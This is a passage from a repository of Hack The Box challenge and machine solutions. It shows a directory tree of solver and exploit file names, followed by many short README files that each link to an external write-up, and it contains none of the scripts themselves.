├── Challenges ├── Pwn │ ├── Void │ │ ├── README.md │ │ └── solve.py │ ├── CRSid │ │ └── README.md │ ├── Entity │ │ ├── README.md │ │ └── solve.py │ ├── Format │ │ ├── README.md │ │ └── solve.py │ ├── Space │ │ ├── README.md │ │ └── solve.py │ ├── knote │ │ └── README.md │ ├── Antidote │ │ ├── README.md │ │ └── solve.py │ ├── Finale │ │ ├── README.md │ │ └── solve.py │ ├── PwnShop │ │ └── README.md │ ├── echoland │ │ ├── README.md │ │ └── dump.py │ ├── Hellhound │ │ ├── README.md │ │ └── solve.py │ ├── Leet Test │ │ ├── README.md │ │ └── solve.py │ ├── Math Door │ │ └── README.md │ ├── Nightmare │ │ ├── README.md │ │ └── solve.py │ ├── No Return │ │ ├── README.md │ │ └── solve.py │ ├── Spellbook │ │ └── README.md │ ├── Auth-or-out │ │ └── README.md │ ├── Blacksmith │ │ ├── README.md │ │ └── solve.py │ ├── Dragon Army │ │ └── README.md │ ├── Fake Snake │ │ ├── README.md │ │ └── solve.py │ ├── FileStorage │ │ └── README.md │ ├── HTB Console │ │ ├── README.md │ │ └── solve.py │ ├── Old Bridge │ │ └── README.md │ ├── Optimistic │ │ ├── README.md │ │ └── solve.py │ ├── Regularity │ │ ├── README.md │ │ └── solve.go │ ├── Spooky Time │ │ ├── README.md │ │ └── solve.py │ ├── Zombiedote │ │ └── README.md │ ├── Zombienator │ │ └── README.md │ ├── Bat Computer │ │ ├── README.md │ │ └── solve.py │ ├── Control Room │ │ └── README.md │ ├── Dead or Alive │ │ └── README.md │ ├── Maze of Mist │ │ └── README.md │ ├── Nowhere to go │ │ ├── README.md │ │ ├── dump.py │ │ └── solve.py │ ├── Oxidized ROP │ │ ├── README.md │ │ └── solve.py │ ├── Picture Magic │ │ └── README.md │ ├── Robot Factory │ │ ├── README.md │ │ └── solve.py │ ├── Shooting star │ │ ├── README.md │ │ └── solve_pwntools.py │ ├── Trick or Deal │ │ ├── README.md │ │ └── solve.py │ ├── Vault-breaker │ │ ├── README.md │ │ └── solve.py │ ├── Bon-nie-appetit │ │ └── README.md │ ├── Fleet Management │ │ ├── README.md │ │ └── solve.py │ ├── Ancient Interface │ │ ├── README.md │ │ └── solve.py │ ├── Great Old Talisman │ │ ├── README.md │ │ └── solve.py │ ├── Dream Diary: Chapter 3 │ │ └── README.md │ ├── Sacred Scrolls: Revenge │ │ ├── README.md │ │ └── solve.py │ ├── Space pirate: Retribution │ │ ├── README.md │ │ └── solve.py │ └── Space pirate: Going Deeper │ │ ├── README.md │ │ └── solve.py ├── Crypto │ ├── MSS │ │ ├── README.md │ │ └── solve.py │ ├── SPG │ │ ├── README.md │ │ └── solve.py │ ├── BFD56 │ │ └── README.md │ ├── AESWCM │ │ ├── README.md │ │ └── solve.py │ ├── AHS512 │ │ ├── README.md │ │ └── solve.py │ ├── Clutch │ │ └── README.md │ ├── RLotto │ │ ├── README.md │ │ └── solve.py │ ├── signup │ │ └── README.md │ ├── BBGun06 │ │ ├── README.md │ │ └── solve.py │ ├── Blessed │ │ └── README.md │ ├── Roulette │ │ └── README.md │ ├── Tsayaki │ │ ├── README.md │ │ └── solve.py │ ├── 400curves │ │ ├── README.md │ │ └── solve.py │ ├── Copperbox │ │ ├── README.md │ │ └── solve.sage │ ├── Fibopadcci │ │ └── README.md │ ├── LunaCrypt │ │ ├── README.md │ │ └── solve.py │ ├── TwoForOne │ │ ├── README.md │ │ └── solve.py │ ├── Bloom Bloom │ │ ├── README.md │ │ └── solve.py │ ├── Composition │ │ └── README.md │ ├── TurboCipher │ │ └── README.md │ ├── Verilicious │ │ ├── README.md │ │ └── solve.py │ ├── AbraCryptabra │ │ └── README.md │ ├── Bank-er-smith │ │ ├── README.md │ │ └── solve.py │ ├── I know Mag1k │ │ └── README.md │ ├── Interception │ │ └── README.md │ ├── Mayday Mayday │ │ ├── README.md │ │ └── solve.py │ ├── Optimus Prime │ │ ├── README.md │ │ └── solve.py │ ├── Oracle Leaks │ │ └── README.md │ ├── Space Pirates │ │ ├── README.md │ │ └── solve.py │ ├── Twin Oracles │ │ └── README.md │ ├── Waiting List │ │ ├── README.md │ │ └── solve.py │ ├── Zombie Rolled │ │ ├── README.md │ │ └── solve.py │ ├── secure source │ │ ├── README.md │ │ └── solve.py │ ├── Biased Heritage │ │ └── README.md │ ├── CryptoConundrum │ │ ├── README.md │ │ └── solve.py │ ├── Not that random │ │ └── README.md │ ├── One Step Closer │ │ ├── README.md │ │ └── solve.sage │ ├── Secure Signing │ │ ├── README.md │ │ └── solve.go │ ├── Signing Factory │ │ └── README.md │ ├── hybrid unifier │ │ ├── README.md │ │ └── solve.py │ ├── Homomurphy's Law │ │ └── README.md │ ├── Infinite Descent │ │ ├── README.md │ │ └── solve.py │ ├── Partial Tenacity │ │ ├── README.md │ │ └── solve.py │ ├── Quadratic Points │ │ └── README.md │ ├── baby quick maffs │ │ ├── README.md │ │ └── solve.py │ ├── Colliding Heritage │ │ └── README.md │ ├── Converging Visions │ │ └── README.md │ ├── Down the Rabinhole │ │ ├── README.md │ │ └── solve.py │ ├── Elliptic Labyrinth │ │ └── README.md │ ├── Infinite Knapsack │ │ └── README.md │ ├── Mind In The Clouds │ │ └── README.md │ ├── Digital Safety Annex │ │ └── README.md │ ├── Find Marher's Secret │ │ └── README.md │ ├── Hash the Filesystem │ │ └── README.md │ ├── Jenny From The Block │ │ ├── README.md │ │ └── solve.py │ ├── Living with Elegance │ │ ├── README.md │ │ └── solve.go │ ├── Android-in-the-Middle │ │ ├── README.md │ │ └── solve.py │ ├── The Three-Eyed Oracle │ │ ├── README.md │ │ └── solve.py │ └── How The Columns Have Turned │ │ ├── README.md │ │ └── solve.py ├── Web │ ├── E.Tree │ │ └── README.md │ ├── wafwaf │ │ └── README.md │ ├── AbuseHumanDB │ │ ├── README.md │ │ └── solve.py │ ├── Breaking Bank │ │ └── README.md │ ├── emoji voting │ │ ├── README.md │ │ └── solve.js │ ├── 0xBOverchunked │ │ ├── README.md │ │ └── solve.go │ ├── Wild Goose Hunt │ │ ├── README.md │ │ └── solve.go │ ├── BatchCraft Potions │ │ └── README.md │ └── baby ninja jinja │ │ └── ssti.py ├── Hardware │ ├── HM74 │ │ ├── README.md │ │ └── solve.py │ └── VHDLock │ │ ├── README.md │ │ └── solve.py ├── Misc │ ├── Triangles │ │ ├── README.md │ │ └── solve.py │ ├── Eternal Loop │ │ └── README.md │ ├── Insane Bolt │ │ ├── README.md │ │ └── solve.py │ ├── M0rsarchive │ │ └── README.md │ ├── SecretRezipe │ │ ├── README.md │ │ └── solve.py │ ├── Deterministic │ │ ├── README.md │ │ └── solve.py │ ├── ExploitedStream │ │ ├── README.md │ │ └── solve.js │ ├── Fentastic Moves │ │ ├── README.md │ │ └── solve.py │ ├── Path of Survival │ │ └── README.md │ ├── Type Exception │ │ ├── README.md │ │ └── solve.py │ ├── Branching Tactics │ │ └── README.md │ ├── Emdee five for life │ │ ├── README.md │ │ ├── solve.sh │ │ └── solve.py │ ├── Computational Recruiting │ │ └── README.md │ └── A Nightmare On Math Street │ │ └── README.md ├── OSINT │ └── Monstrosity │ │ ├── README.md │ │ └── analyze.py ├── Reversing │ ├── Headache │ │ ├── README.md │ │ └── solve.py │ ├── Rebuilding │ │ ├── README.md │ │ └── solve.py │ ├── The Vault │ │ ├── README.md │ │ └── solve.py │ ├── Up a Stream │ │ ├── README.md │ │ └── Solve.java │ ├── Potion Master │ │ ├── README.md │ │ └── solve.py │ └── Spooky License │ │ ├── README.md │ │ └── solve.py └── Forensics │ ├── Deadly Arthropod │ └── README.md │ └── Halloween Invitation │ └── README.md └── Machines ├── Antique ├── decode.py └── README.md ├── Rope ├── README.md └── fmtstr_exploit.py ├── NodeBlog ├── package.json ├── nosqli.sh ├── xxe.py └── unserialize_rce.js ├── Hancliffe ├── encrypt1.c ├── encrypt2.c ├── decrypt.sh └── exploit.py ├── Forge └── ssrf.py ├── Spider ├── xxe.sh └── ssti.py ├── Backdoor └── dpt.py ├── RainyDay ├── crack.py └── extract_pepper.py ├── Bizness ├── README.md └── ofbiz_exploit.sh ├── Awkward └── readFile.js ├── BountyHunter └── xxe.sh ├── Shared ├── sqli.js └── README.md ├── OverGraph ├── bf_token.py ├── exploit_rce.py ├── exploit_write.py └── extract_id_rsa.py ├── Health ├── crack.go └── ssrf.py ├── Monitors └── deserialization.sh ├── Alert └── lfr.py ├── Scanned └── crack.go ├── Timing └── upload.py ├── Stocker └── nosqli_regex.py ├── UpDown └── php_execute.py ├── Static ├── xdebug_shell.py ├── get_vpn.rb └── exploit.py ├── Horizontall └── rce_strapi.py ├── Soccer └── README.md ├── Intelligence └── reqPdf.go ├── Altered └── bf_pin.rb ├── Writer └── foothold.py └── Retired └── third_exploit.py /Challenges/Pwn/Void/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Void 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/void 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/MSS/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. MSS 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/mss 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/SPG/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. SPG 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/spg 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/CRSid/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. CRSid 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/crsid 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Entity/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Entity 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/entity 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Format/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Format 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/format 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Space/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Space 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/space 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/knote/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. knote 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/knote 4 | -------------------------------------------------------------------------------- /Challenges/Web/E.Tree/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Web. E.Tree 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/web/e.tree 4 | -------------------------------------------------------------------------------- /Challenges/Web/wafwaf/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Web. wafwaf 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/web/wafwaf 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/BFD56/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. BFD56 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/bfd56 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Antidote/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Antidote 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/antidote 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Finale/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Pumpking 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/pumpking 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/PwnShop/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. PwnShop 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/pwnshop 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/echoland/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. echoland 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/echoland 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/AESWCM/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. AESWCM 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/aeswcm 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/AHS512/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. AHS512 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/ahs512 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Clutch/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Clutch 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/clutch 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/RLotto/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. RLotto 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/rlotto 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/signup/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. signup 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/signup 4 | -------------------------------------------------------------------------------- /Challenges/Hardware/HM74/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Hardware. HM74 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/hardware/hm74 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Hellhound/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Hellhound 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/hellhound 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Leet Test/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Leet Test 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/leet-test 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Math Door/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Math Door 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/math-door 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Nightmare/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Nightmare 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/nightmare 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/No Return/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. No Return 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/no-return 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Spellbook/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Spellbook 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/spellbook 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/BBGun06/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. BBGun06 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/bbgun06 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Blessed/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Blessed 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/blessed 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Roulette/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Roulette 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/roulette 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Tsayaki/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Tsayaki 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/tsayaki 4 | -------------------------------------------------------------------------------- /Challenges/Misc/Triangles/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Misc. Triangles 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/misc/triangles 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Auth-or-out/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Auth-or-out 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/auth-or-out 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Blacksmith/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Blacksmith 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/blacksmith 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Dragon Army/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Dragon Army 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/dragon-army 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Fake Snake/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Fake Snake 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/fake-snake 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/FileStorage/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. FileStorage 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/filestorage 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/HTB Console/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. HTB Console 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/htb-console 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Old Bridge/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Old Bridge 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/old-bridge 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Optimistic/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Optimistic 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/optimistic 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Regularity/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Regularity 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/regularity 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Spooky Time/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Spooky Time 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/spooky-time 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Zombiedote/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Zombiedote 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/zombiedote 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Zombienator/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Zombienator 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/zombienator 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/400curves/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. 400curves 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/400curves 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Copperbox/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Copperbox 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/copperbox 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Fibopadcci/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Fibopadcci 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/fibopadcci 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/LunaCrypt/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. LunaCrypt 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/lunacrypt 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/TwoForOne/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. TwoForOne 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/twoforone 4 | -------------------------------------------------------------------------------- /Challenges/Hardware/VHDLock/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Hardware. VHDLock 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/hardware/vhdlock 4 | -------------------------------------------------------------------------------- /Challenges/Misc/Eternal Loop/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Misc. Eternal Loop 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/misc/eternal-loop 4 | -------------------------------------------------------------------------------- /Challenges/Misc/Insane Bolt/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Misc. Insane Bolt 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/misc/insane-bolt 4 | -------------------------------------------------------------------------------- /Challenges/Misc/M0rsarchive/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Misc. M0rsarchive 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/misc/m0rsarchive 4 | -------------------------------------------------------------------------------- /Challenges/Misc/SecretRezipe/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Misc. SecretRezipe 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/misc/secretrezipe 4 | -------------------------------------------------------------------------------- /Challenges/OSINT/Monstrosity/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. OSINT. Monstrosity 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/osint/monstrosity 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Bat Computer/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Bat Computer 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/bat-computer 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Control Room/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Control Room 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/control-room 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Dead or Alive/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Dead or Alive 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/dead-or-alive 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Maze of Mist/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Maze of Mist 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/maze-of-mist 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Nowhere to go/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Nowhere to go 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/nowhere-to-go 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Oxidized ROP/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Oxidized ROP 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/oxidized-rop 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Picture Magic/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Picture Magic 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/picture-magic 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Robot Factory/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Robot Factory 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Shooting star/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Shooting star 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/shooting-star 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Trick or Deal/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Trick or Deal 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/trick-or-deal 4 | -------------------------------------------------------------------------------- /Challenges/Pwn/Vault-breaker/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Pwn. Vault-breaker 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/pwn/vault-breaker 4 | -------------------------------------------------------------------------------- /Challenges/Web/AbuseHumanDB/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Web. AbuseHumanDB 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/web/abusehumandb 4 | -------------------------------------------------------------------------------- /Challenges/Web/Breaking Bank/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Web. Breaking Bank 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/web/breaking-bank 4 | -------------------------------------------------------------------------------- /Challenges/Web/emoji voting/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Web. emoji voting 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/web/emoji-voting 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Bloom Bloom/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Bloom Bloom 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/bloom-bloom 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Composition/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Composition 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/composition 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/TurboCipher/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. TurboCipher 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/turbocipher 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Verilicious/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Verilicious 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/verilicious 4 | -------------------------------------------------------------------------------- /Challenges/Misc/Deterministic/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Misc. Deterministic 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/misc/deterministic 4 | -------------------------------------------------------------------------------- /Challenges/Reversing/Headache/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Reversing. Headache 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/reversing/headache 4 | -------------------------------------------------------------------------------- /Challenges/Web/0xBOverchunked/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Web. 0xBOverchunked 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/web/0xboverchunked 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/AbraCryptabra/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. AbraCryptabra 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/abracryptabra 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Bank-er-smith/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Bank-er-smith 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/bank-er-smith 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/I know Mag1k/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. I know Mag1k 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/i-know-mag1k 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Interception/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Interception 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/interception 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Mayday Mayday/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Box. Challenges. Crypto. Mayday Mayday 2 | 3 | Challenge write-up: https://7rocky.github.io/en/ctf/htb-challenges/crypto/mayday-mayday 4 | -------------------------------------------------------------------------------- /Challenges/Crypto/Optimus Prime/README.md: 